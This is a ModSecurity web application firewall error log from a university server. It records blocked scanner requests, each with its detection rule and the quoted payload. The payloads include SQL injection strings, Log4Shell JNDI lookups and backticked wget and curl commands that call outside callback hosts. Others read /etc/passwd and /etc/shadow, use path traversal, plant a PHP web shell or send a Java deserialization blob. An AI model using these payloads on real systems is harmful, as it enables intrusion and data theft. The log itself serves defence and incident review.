[Tue Aug 29 11:34:17.381619 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAASK4gAAAAAI"]
[Tue Aug 29 11:34:19.319054 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAAShCXoAAAAi"]
[Tue Aug 29 11:34:19.359055 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAASGMvEAAAAA"]
[Tue Aug 29 11:34:19.371522 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlgxj1wjdahuth3t.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAASEJVUAAAAE"]
[Tue Aug 29 11:34:21.186182 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "143.244.44.146_d118223f8a4db29c3a5de79fe8e26219fc4dbae5"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11TMCo-f0AAAPDoOgAAAAP"]
[Tue Aug 29 11:34:23.235619 2023] [:error] [pid 1233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11T8Co-f0AAATRZVQAAAAQ"]
[Tue Aug 29 11:34:23.654045 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11T8Co-f0AAASK4hIAAAAI"]
[Tue Aug 29 11:34:25.543932 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x22id\\x22: 1, \\x22method\\x22: \\x22global.login\\x22, \\x22params\\x22: {\\x22authorityType\\x22: \\x22Default\\x22, \\x22clientType\\x22: \\x22NetKeyboard\\x22, \\x22loginType\\x22: \\x22Direct\\x22, \\x22password\\x22: \\x22Not Used\\x22, \\x22passwordType\\x22: \\x22Default\\x22, \\x22userName\\x22: \\x22admin\\x22}, \\x22session\\x22: 0}: {\\x22id\\x22: 1, [hostname "repositoryfeb.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAATXLJ4AAAAb"]
[Tue Aug 29 11:34:26.254912 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAAUIz54AAABA"]
[Tue Aug 29 11:34:26.357388 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAUZcEEAAABO"]
[Tue Aug 29 11:34:26.371525 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlg9bi6hfapyocet.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUB00YAAAA5"]
[Tue Aug 29 11:34:27.791580 2023] [:error] [pid 1240] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAATYeC0AAAAd"]
[Tue Aug 29 11:34:28.230694 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "repositoryfeb.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11VMCo-f0AAAUbgzYAAABQ"]
[Tue Aug 29 11:34:29.332975 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgg1xmtw8owudm1.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAATWYQMAAAAa"]
[Tue Aug 29 11:34:29.459963 2023] [:error] [pid 1233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAATRZVgAAAAQ"]
[Tue Aug 29 11:34:29.552547 2023] [:error] [pid 1237] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAATVtRYAAAAZ"]
[Tue Aug 29 11:34:30.339908 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlg891btsmgozhjd.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAAUJIxQAAABB"]
[Tue Aug 29 11:34:30.437454 2023] [:error] [pid 1279] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlgkfeqaz8e9cyec.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VsCo-f0AAAT-IXYAAAA3"]
[Tue Aug 29 11:34:31.427824 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAATZp44AAAAf"]
[Tue Aug 29 11:34:32.324324 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAAULx7AAAABD"]
[Tue Aug 29 11:34:32.325435 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAAShCYgAAAAi"]
[Tue Aug 29 11:34:33.327052 2023] [:error] [pid 1268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAAT0eBkAAAAy"]
[Tue Aug 29 11:34:35.335365 2023] [:error] [pid 1256] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAATovmYAAAAt"]
[Tue Aug 29 11:34:37.301760 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAATZp5IAAAAf"]
[Tue Aug 29 11:34:38.311905 2023] [:error] [pid 1251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlgej4s69iie4io6.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAATjF38AAAAo"]
[Tue Aug 29 11:34:38.316559 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlg8sagahcf7p9bs.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAAUXLhsAAABM"]
[Tue Aug 29 11:34:38.329523 2023] [:error] [pid 1311] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAAUfi8kAAABU"]
[Tue Aug 29 11:34:41.317003 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAAT9POgAAAA1"]
[Tue Aug 29 11:34:42.345330 2023] [:error] [pid 1279] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAAT-IYEAAAA3"]
[Tue Aug 29 11:34:44.301688 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAAUZcE8AAABO"]
